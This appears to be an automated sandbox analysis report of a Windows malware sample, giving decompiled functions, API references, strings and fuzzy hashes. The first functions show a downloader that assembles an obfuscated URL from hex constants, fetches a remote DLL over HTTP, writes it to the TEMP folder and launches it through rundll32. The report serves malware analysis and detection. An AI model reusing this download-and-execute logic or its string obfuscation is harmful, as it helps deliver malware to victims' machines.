						lstrcatW( &_v520,  &_v676);
						lstrcatW( &_v520,  &_v708);
						lstrcatW( &_v520,  &_v700);
						_t62 = E00401980( &_v520, 1);
						_t76 =  &(_t76[4]);
					} while (_t62 == 0);
					_v608 = 0x740068;
					_v604 = 0x700074;
					_v600 = 0x3a0073;
					_v596 = 0x2f002f;
					_v592 = 0x2e0061;
					_v588 = 0x6f0067;
					_v584 = 0x740061;
					_v580 = 0x610067;
					_v576 = 0x65006d;
					_v572 = 0x63002e;
					_v568 = 0x2f006f;
					_v564 = 0x730075;
					_v560 = 0x720065;
					_v556 = 0x2f0066;
					_v552 = 0x610064;
					_v548 = 0x2f0074;
					_v544 = 0x710073;
					_v540 = 0x69006c;
					_v536 = 0x650074;
					_v532 = 0x64002e;
					_v528 = 0x6c006c;
					_v524 = 0;
					_t64 = E00401980( &_v608, 2);
					_t76 =  &(_t76[4]);
				} while (_t64 == 0);
				_push(0x40cb38);
				_push(L"rundll32.exe");
				return E00401050();
			}

0x00401fd0
0x00401fea
0x00401fec
0x00401fec
0x00401fec
0x00401fec
0x00401ff1
0x00401ff8
0x00402009
0x00402011
0x00402019
0x00402021
0x00402029
0x00402031
0x00402039
0x00402041
0x00402049
0x00402051
0x00402059
0x00402061
0x00402069
0x00402071
0x00402079
0x0040207d
0x00402081
0x00402085
0x0040208a
0x00402092
0x0040209a
0x004020a2
0x004020aa
0x004020ae
0x004020b6
0x004020c5
0x004020d4
0x004020e0
0x004020e5
0x004020e8
0x004020f7
0x004020ff
0x0040210a
0x00402115
0x00402120
0x0040212b
0x00402136
0x00402141
0x0040214c
0x00402157
0x00402162
0x0040216d
0x00402178
0x00402183
0x0040218e
0x00402195
0x0040219c
0x004021a7
0x004021b2
0x004021bd
0x004021c8
0x004021d3
0x004021da
0x004021df
0x004021e2
0x004021ea
0x004021ef
0x00402206

APIs

lstrcatW.KERNEL32 ref: 004020B6
lstrcatW.KERNEL32(?,?), ref: 004020C5
lstrcatW.KERNEL32(?,?), ref: 004020D4

Part of subcall function 00401980: LoadLibraryA.KERNEL32(ole32,CoCreateInstance,00610064,73BB82B0), ref: 004019B7
Part of subcall function 00401980: GetProcAddress.KERNEL32(00000000), ref: 004019BE
Part of subcall function 00401980: SysAllocString.OLEAUT32(?), ref: 00401A47

Strings

o, xrefs: 00402162
rundll32.exe, xrefs: 004021EF
g, xrefs: 00402141
a, xrefs: 00402039
m, xrefs: 0040214C
., xrefs: 004021BD
e, xrefs: 00402069
a, xrefs: 00402136
t, xrefs: 004020AE
s, xrefs: 0040210A
f, xrefs: 00402071
i, xrefs: 0040209A
s, xrefs: 0040219C
l, xrefs: 004021A7
m, xrefs: 00402049
t, xrefs: 00402011
a, xrefs: 00402029
h, xrefs: 004020F7
t, xrefs: 004021B2
/, xrefs: 00402021
g, xrefs: 0040212B
s, xrefs: 00402019
g, xrefs: 00402041
t, xrefs: 004020FF
e, xrefs: 004020A2
a, xrefs: 00402120
u, xrefs: 0040216D
o, xrefs: 00402059
e, xrefs: 00402178
h, xrefs: 00402009
f, xrefs: 00402183
/, xrefs: 0040208A
g, xrefs: 00402031
l, xrefs: 004021C8
., xrefs: 00402157
., xrefs: 00402051
/, xrefs: 00402115
q, xrefs: 00402092
u, xrefs: 00402061

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$AddressAllocLibraryLoadProcString
String ID: .$.$.$/$/$/$a$a$a$a$e$e$e$f$f$g$g$g$g$h$h$i$l$l$m$m$o$o$q$rundll32.exe$s$s$s$t$t$t$t$u$u
API String ID: 2515409318-2062937538
Opcode ID: 8f864ac3687296d7bd065da5814715d3cd2f59a65372d2eb1aee6f7aacca891d
Instruction ID: 94f93bd35c47668ddd46f7dbdeea39e45e68a997e564552175ff46278fcdb505
Opcode Fuzzy Hash: 8f864ac3687296d7bd065da5814715d3cd2f59a65372d2eb1aee6f7aacca891d
Instruction Fuzzy Hash: 4441DAB4509384DEE320DF51D448B9BFBE6FB85B48F00492DE68856251D7F6818CCF66

Uniqueness

Uniqueness Score: -1.00%

Function 00401980, Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
libraryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401980(intOrPtr _a4, intOrPtr _a8) {
				long _v28;
				signed int _v36;
				char _v56;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v120;
				signed int _v132;
				intOrPtr* _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				long _v616;
				intOrPtr _v636;
				void* _v640;
				intOrPtr* _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				struct _OVERLAPPED* _v652;
				struct _OVERLAPPED* _v656;
				intOrPtr* _v660;
				short _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				char _v676;
				struct _OVERLAPPED* _v680;
				intOrPtr _v684;
				char _v688;
				short _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				long _v704;
				intOrPtr* _v708;
				char _v712;
				intOrPtr _v716;
				char _v724;
				char _v728;
				long _v740;
				void* _v744;
				intOrPtr _v756;
				intOrPtr _v760;
				_Unknown_base(*)()* _t107;
				intOrPtr _t110;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr* _t121;
				int _t124;
				intOrPtr* _t130;
				intOrPtr _t149;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr _t174;
				intOrPtr _t175;
				intOrPtr* _t176;
				intOrPtr _t179;
				intOrPtr _t195;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr _t208;
				WCHAR* _t212;
				void* _t213;
				signed int _t215;
				signed int _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				intOrPtr* _t220;

				_t216 = _t215 & 0xfffffff8;
				_push(0xffffffff);
				_push(E00407B9D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t216;
				_t217 = _t216 - 0x274;
				_v616 = 0;
				_v640 = 0;
				_t107 = GetProcAddress(LoadLibraryA("ole32"), "CoCreateInstance");
				_push( &_v640);
				_push(0x40a080);
				_push(0x17);
				_push(0);
				_push(0x40a070);
				if( *_t107() < 0) {
					L45:
					 *[fs:0x0] = _v36;
					return _v636;
				} else {
					_t174 =  *0x40d2b8; // 0x0
					_t110 =  *0x40d2bc; // 0x0
					_t156 =  *0x40d2c0; // 0x80020004
					_v616 = _t174;
					_t175 =  *0x40d2c4; // 0x0
					_v648 = 0x47;
					_v647 = 0x45;
					_v646 = 0x54;
					_v645 = 0;
					_v612 = _t110;
					_v608 = _t156;
					_v604 = _t175;
					_t206 = E0040225B(0xc);
					_t218 = _t217 + 4;
					_v640 = _t206;
					_t195 = _a4;
					_v28 = 0;
					if(_t206 == 0) {
						_t206 = 0;
					} else {
						 *((intOrPtr*)(_t206 + 4)) = 0;
						 *(_t206 + 8) = 1;
						__imp__#2(_t195);
						 *_t206 = 0;
						if(0 == 0 && _t195 != 0) {
							E00407633(0x8007000e);
						}
					}
					_v644 = _t206;
					_v28 = 0xffffffff;
					_v640 = _t206;
					if(_t206 == 0) {
						E00407633(0x8007000e);
					}
					_v28 = 1;
					if(_t206 == 0) {
						_v656 = 0;
					} else {
						_v656 =  *_t206;
					}
					_t207 = E0040225B(0xc);
					_t219 = _t218 + 4;
					_v652 = _t207;
					_v28 = 2;
					if(_t207 == 0) {
						_t207 = 0;
					} else {
						 *(_t207 + 4) = 0;
						 *(_t207 + 8) = 1;
						_t149 = E004076E0( &_v648,  &_v648);
						 *_t207 = _t149;
						if(_t149 == 0) {
							E00407633(0x8007000e);
						}
					}
					_v28 = 1;
					_v600 = _t207;
					if(_t207 == 0) {
						E00407633(0x8007000e);
					}
					_v28 = 3;
					if(_t207 == 0) {
						_v652 = 0;
					} else {
						_v652 =  *_t207;
					}
					_t220 = _t219 - 0x10;
					_t176 = _t220;
					_t114 = _v660;
					 *_t176 = _v616;
					 *((intOrPtr*)(_t176 + 4)) = _v612;
					 *((intOrPtr*)(_t176 + 8)) = _v608;
					 *((intOrPtr*)(_t176 + 0xc)) = _v604;
					_t200 =  *((intOrPtr*)( *_t114 + 0x24))(_t114, _v652, _v656);
					_v56 = 1;
					if(_t207 != 0) {
						_t45 = _t207 + 8; // 0x8
						if(InterlockedDecrement(_t45) == 0) {
							E00401E20(_t207);
							E00402250(_t207);
							_t220 = _t220 + 4;
						}
					}
					_t208 = _v672;
					_v56 = 0xffffffff;
					if(_t208 != 0 && InterlockedDecrement(_t208 + 8) == 0) {
						E00401E20(_t208);
						E00402250(_t208);
						_t220 = _t220 + 4;
					}
					if(_t200 < 0) {
						L44:
						_t116 = _v688;
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						goto L45;
					} else {
						_t118 =  *0x40d2b8; // 0x0
						_t159 =  *0x40d2bc; // 0x0
						_t179 =  *0x40d2c0; // 0x80020004
						_t201 = _t220 - 0x10;
						 *_t201 = _t118;
						_t119 =  *0x40d2c4; // 0x0
						 *((intOrPtr*)(_t201 + 4)) = _t159;
						 *((intOrPtr*)(_t201 + 8)) = _t179;
						_push(_v688);
						 *((intOrPtr*)(_t201 + 0xc)) = _t119;
						if( *((intOrPtr*)( *_v688 + 0x34))() < 0) {
							goto L44;
						} else {
							_t121 = _v708;
							 *((intOrPtr*)( *_t121 + 0x38))(_t121,  &_v692);
							if(_v700 != 0xc8) {
								goto L44;
							} else {
								_t124 = E00401E70(_v716,  &_v688);
								_v88 = 4;
								if(_v692 != 0x2011) {
									L42:
									_v84 = 0xffffffff;
									__imp__#9( &_v688);
									if(_t124 < 0) {
										E00407633(_t124);
									}
									goto L44;
								} else {
									__imp__#17(_v680);
									if(_t124 != 1) {
										goto L42;
									} else {
										__imp__#20(_v684, _t124,  &_v712);
										__imp__#19(_v696, 1,  &_v728);
										_v740 = _v740 + 1;
										__imp__#23(_v708,  &_v724);
										_t212 = E0040263E(_a4, 0x2f) + 2;
										_v688 = 0x450054;
										_v684 = 0x50004d;
										_v680 = 0;
										_v676 = 0x45746547;
										_v672 = 0x7269766e;
										_v668 = 0x656d6e6f;
										_v664 = 0x6156746e;
										_v660 = 0x62616972;
										_v656 = 0x57656c;
										_t130 = E00401000( &_v676);
										if(_t130 != 0) {
											_push(0x104);
											_push( &_v652);
											_push( &_v688);
											if( *_t130() != 0) {
												lstrcatW( &_v664, "\\");
												lstrcatW( &_v664, _t212);
												_t212 =  &_v664;
											}
											if(_a8 == 2) {
												wsprintfW(0x40cb38, L"\"%s\",global", _t212);
											}
											_t124 = CreateFileW(_t212, 0x40000000, 0, 0, 2, 0x80, 0);
											_t213 = _t124;
											if(_t213 != 0xffffffff) {
												WriteFile(_t213, _v744, _v760 - _v756,  &_v704, 0);
												_v740 = 1;
												_t124 = CloseHandle(_t213);
											}
											__imp__#24(_v728);
											goto L42;
										} else {
											_v120 = 0xffffffff;
											__imp__#9( &_v724);
											if(_t130 < 0) {
												E00407633(_t130);
											}
											 *[fs:0x0] = _v132;
											return 0;
										}
									}
								}
							}
						}
					}
				}
			}

0x00401983
0x00401986
0x00401988
0x00401993
0x00401994
0x0040199b
0x004019af
0x004019b3
0x004019be
0x004019c8
0x004019c9
0x004019ce
0x004019d0
0x004019d2
0x004019db
0x00401df9
0x00401e05
0x00401e10
0x004019e1
0x004019e1
0x004019e7
0x004019ec
0x004019f2
0x004019f6
0x004019fe
0x00401a03
0x00401a08
0x00401a0d
0x00401a12
0x00401a16
0x00401a1a
0x00401a23
0x00401a25
0x00401a28
0x00401a2c
0x00401a33
0x00401a3a
0x00401a63
0x00401a3c
0x00401a3d
0x00401a40
0x00401a47
0x00401a4f
0x00401a51
0x00401a5c
0x00401a5c
0x00401a51
0x00401a67
0x00401a6b
0x00401a76
0x00401a7a
0x00401a81
0x00401a81
0x00401a88
0x00401a93
0x00401a9d
0x00401a95
0x00401a97
0x00401a97
0x00401aac
0x00401aae
0x00401ab1
0x00401ab7
0x00401abf
0x00401aeb
0x00401ac1
0x00401ac5
0x00401acd
0x00401ad4
0x00401adb
0x00401add
0x00401ae4
0x00401ae4
0x00401add
0x00401aef
0x00401af7
0x00401afb
0x00401b02
0x00401b02
0x00401b09
0x00401b11
0x00401b1b
0x00401b13
0x00401b15
0x00401b15
0x00401b27
0x00401b2a
0x00401b2c
0x00401b30
0x00401b38
0x00401b3f
0x00401b46
0x00401b59
0x00401b5b
0x00401b63
0x00401b65
0x00401b71
0x00401b75
0x00401b7b
0x00401b80
0x00401b80
0x00401b71
0x00401b83
0x00401b87
0x00401b94
0x00401ba6
0x00401bac
0x00401bb1
0x00401bb1
0x00401bb6
0x00401def
0x00401def
0x00401df6
0x00000000
0x00401bbc
0x00401bbc
0x00401bc1
0x00401bca
0x00401bd4
0x00401bd8
0x00401bda
0x00401bdf
0x00401be2
0x00401be9
0x00401bea
0x00401bf2
0x00000000
0x00401bf8
0x00401bf8
0x00401c04
0x00401c0f
0x00000000
0x00401c15
0x00401c1e
0x00401c2a
0x00401c35
0x00401dcf
0x00401dd3
0x00401ddf
0x00401de7
0x00401dea
0x00401dea
0x00000000
0x00401c3b
0x00401c40
0x00401c49
0x00000000
0x00401c4f
0x00401c5a
0x00401c6c
0x00401c81
0x00401c85
0x00401c9d
0x00401ca0
0x00401ca8
0x00401cb0
0x00401cb8
0x00401cc0
0x00401cc8
0x00401cd0
0x00401cd8
0x00401ce0
0x00401ce8
0x00401cf2
0x00401d2e
0x00401d37
0x00401d38
0x00401d3d
0x00401d4f
0x00401d57
0x00401d59
0x00401d59
0x00401d61
0x00401d6e
0x00401d74
0x00401d8a
0x00401d90
0x00401d95
0x00401daf
0x00401db6
0x00401dbe
0x00401dbe
0x00401dc9
0x00000000
0x00401cf4
0x00401cf8
0x00401d04
0x00401d0c
0x00401d0f
0x00401d0f
0x00401d1d
0x00401d29
0x00401d29
0x00401cf2
0x00401c49
0x00401c35
0x00401c0f
0x00401bf2
0x00401bb6

APIs

LoadLibraryA.KERNEL32(ole32,CoCreateInstance,00610064,73BB82B0), ref: 004019B7
GetProcAddress.KERNEL32(00000000), ref: 004019BE
SysAllocString.OLEAUT32(?), ref: 00401A47
InterlockedDecrement.KERNEL32(00000008), ref: 00401B69
InterlockedDecrement.KERNEL32(?), ref: 00401B9A
SafeArrayGetDim.OLEAUT32(?), ref: 00401C40
SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 00401C5A
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00401C6C
SafeArrayAccessData.OLEAUT32(?,?), ref: 00401C85
VariantClear.OLEAUT32(?), ref: 00401D04
lstrcatW.KERNEL32(?,0040A06C), ref: 00401D4F
lstrcatW.KERNEL32(?,-00000002), ref: 00401D57
wsprintfW.USER32 ref: 00401D6E
CreateFileW.KERNEL32(-00000002,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401D8A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401DAF
CloseHandle.KERNEL32 ref: 00401DBE
SafeArrayUnaccessData.OLEAUT32(?), ref: 00401DC9
VariantClear.OLEAUT32(00002011), ref: 00401DDF

Strings

CoCreateInstance, xrefs: 004019A5
ntVa, xrefs: 00401CD0
nvir, xrefs: 00401CC0
leW, xrefs: 00401CE0
G, xrefs: 004019FE
"%s",global, xrefs: 00401D64
riab, xrefs: 00401CD8
T, xrefs: 00401CA0
T, xrefs: 00401A08
onme, xrefs: 00401CC8
ole32, xrefs: 004019AA
GetE, xrefs: 00401CB8
E, xrefs: 00401A03
M, xrefs: 00401CA8

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundClearDataDecrementFileInterlockedVariantlstrcat$AccessAddressAllocCloseCreateHandleLibraryLoadProcStringUnaccessWritewsprintf
String ID: "%s",global$CoCreateInstance$E$G$GetE$M$T$T$leW$ntVa$nvir$ole32$onme$riab
API String ID: 895335699-2275290888
Opcode ID: 5e746ada17a097ae99fe4af7f44687cd509173ca61491f0219b61594ec2a5691
Instruction ID: 6257b2323d03b648742c763a37ac7d4c88d4c1fab92b2dc60e61fb4d6374e78a
Opcode Fuzzy Hash: 5e746ada17a097ae99fe4af7f44687cd509173ca61491f0219b61594ec2a5691
Instruction Fuzzy Hash: 39D191715087419FC320DF64C944B5BBBE4BF88714F108A2EF595A73A0D778E905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406967, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00406967(int _a4, int _a8, signed char _a9, char* _a12, char _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				char _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x408588);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x40d168; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t3 =  &_a16; // 0x406d59
						_t83 = E00406B8B(_a12,  *_t3);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x40d168; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x40d160; // 0x0
								_a28 = _t82;
							}
							_t14 =  &_a16; // 0x406d59
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12,  *_t14, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406590(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0) {
									goto L21;
								} else {
									_t27 =  &_a16; // 0x406d59
									if(MultiByteToWideChar(_a28, 1, _a12,  *_t27, _v40, _t88) == 0) {
										goto L21;
									} else {
										_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
										_v44 = _t99;
										if(_t99 == 0) {
											goto L21;
										} else {
											if((_a9 & 0x00000004) == 0) {
												_v8 = 1;
												E00406590(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
												_v28 = _t102;
												_t89 = _t102;
												_v36 = _t89;
												_v8 = _v8 | 0xffffffff;
												if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
													goto L21;
												} else {
													_push(0);
													_push(0);
													if(_a24 != 0) {
														_push(_a24);
														_push(_a20);
													} else {
														_push(0);
														_push(0);
													}
													_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
													if(_t99 == 0) {
														goto L21;
													} else {
														goto L30;
													}
												}
											} else {
												if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
													L30:
													_t62 = _t99;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t8 =  &_a16; // 0x406d59
						_t62 = LCMapStringA(_a4, _a8, _a12,  *_t8, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x408580, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40857c, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x40d168 = 2;
							goto L5;
						}
					} else {
						 *0x40d168 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x0040696a
0x0040696c
0x00406971
0x0040697c
0x0040697d
0x00406984
0x0040698a
0x0040698f
0x00406995
0x004069dd
0x004069e0
0x004069e2
0x004069e8
0x004069ee
0x004069ef
0x004069ef
0x004069f2
0x004069fa
0x00406a1c
0x00000000
0x00406a22
0x00406a25
0x00406a27
0x00406a2c
0x00406a2c
0x00406a31
0x00406a3c
0x00406a4c
0x00406a4e
0x00406a53
0x00000000
0x00406a59
0x00406a59
0x00406a64
0x00406a69
0x00406a6e
0x00406a71
0x00406a8d
0x00000000
0x00406a8f
0x00406a93
0x00406aa6
0x00000000
0x00406aa8
0x00406aba
0x00406abc
0x00406ac1
0x00000000
0x00406ac3
0x00406ac7
0x00406b09
0x00406b18
0x00406b1d
0x00406b20
0x00406b22
0x00406b25
0x00406b3f
0x00000000
0x00406b59
0x00406b5c
0x00406b5d
0x00406b5e
0x00406b64
0x00406b67
0x00406b60
0x00406b60
0x00406b61
0x00406b61
0x00406b7a
0x00406b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b7e
0x00406ac9
0x00406acc
0x00406b84
0x00406b84
0x00000000
0x00000000
0x00000000
0x00406acc
0x00406ac7
0x00406ac1
0x00406aa6
0x00406a8d
0x00406a53
0x004069fc
0x00406a02
0x00406a0e
0x00406a0e
0x00406997
0x00406997
0x00406998
0x0040699b
0x004069b1
0x004069cd
0x00406af5
0x00406af5
0x004069d3
0x004069d3
0x00000000
0x004069d3
0x004069b3
0x004069b3
0x00000000
0x004069b3
0x004069b1
0x00406afd
0x00406b08

APIs

LCMapStringW.KERNEL32(00000000,00000100,00408580,00000001,00000000,00000000,73B770F0,0040D2CC,?,?,?,00406D59,?,?,?,00000000), ref: 004069A9
LCMapStringA.KERNEL32(00000000,00000100,0040857C,00000001,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 004069C5
LCMapStringA.KERNEL32(?,?,?,Ym@,?,?,73B770F0,0040D2CC,?,?,?,00406D59,?,?,?,00000000), ref: 00406A0E
MultiByteToWideChar.KERNEL32(0000000A,00000001,?,Ym@,00000000,00000000,73B770F0,0040D2CC,?,?,?,00406D59,?,?,?,00000000), ref: 00406A46
MultiByteToWideChar.KERNEL32(0000000A,00000001,?,?,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406A9E
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AB4
LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AE7
LCMapStringW.KERNEL32(?,?,00000000,?,?,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406B4F

Strings

Ym@, xrefs: 00406A31, 00406A93, 00406A02, 004069E2

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: Ym@
API String ID: 352835431-983799895
Opcode ID: ef1fee7cd351a263e99fe021380e22bfb6433c57ea9a695f41b5d44ff5ea1ccc
Instruction ID: 8176bab637704051148fc11e8be7c68dcba1f85ecf9eaa0d196e4c066afb4d79
Opcode Fuzzy Hash: ef1fee7cd351a263e99fe021380e22bfb6433c57ea9a695f41b5d44ff5ea1ccc
Instruction Fuzzy Hash: 16517A71900209EBCF219F94CD45A9B7FB8FB49750F11813AF912B22A0D7398D20EB69

Uniqueness

Uniqueness Score: -1.00%

Function 004065BF, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004065BF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x40d128 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x40d12c; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x40d130; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x40d128(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x40d128 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x40d12c = GetProcAddress(_t15, "GetActiveWindow");
					 *0x40d130 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x004065c0
0x004065c2
0x004065ca
0x0040660e
0x0040660e
0x00406615
0x00406619
0x0040661d
0x0040661f
0x00406626
0x0040662b
0x0040662b
0x00406626
0x0040661d
0x00000000
0x0040663a
0x004065d7
0x004065db
0x00406644
0x00000000
0x00406644
0x004065e9
0x004065ed
0x004065f2
0x00000000
0x004065f4
0x00406602
0x00406609
0x00000000
0x00406609

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0040406D,?,Microsoft Visual C++ Runtime Library,00012010,?,0040849C,?,004084EC,?,?,?,Runtime Error!Program: ), ref: 004065D1
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065E9
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065FA
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406607

Strings

GetActiveWindow, xrefs: 004065F4
GetLastActivePopup, xrefs: 004065FC
user32.dll, xrefs: 004065CC
MessageBoxA, xrefs: 004065E3

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: de83a2be77e068634bcef9c668b0e23e5eba04819015b72b58bffe3a3692adde
Instruction ID: 35a4cb16e12441fde5839e4f023c85a4599c8dad3030ff745eaf4ba572c972f4
Opcode Fuzzy Hash: de83a2be77e068634bcef9c668b0e23e5eba04819015b72b58bffe3a3692adde
Instruction Fuzzy Hash: 53014871A007116FD7109FF55E80A2B3AD9EB4C754715083FE681F6290DE7AC8658B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406BB6(int _a4, char* _a8, int _a12, char _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x4085a0);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x40d16c; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x40d160; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406590(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406750(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t26 =  &_a16; // 0x406d59
										_t32 = GetStringTypeW(_a4, _t60, _t43,  *_t26);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
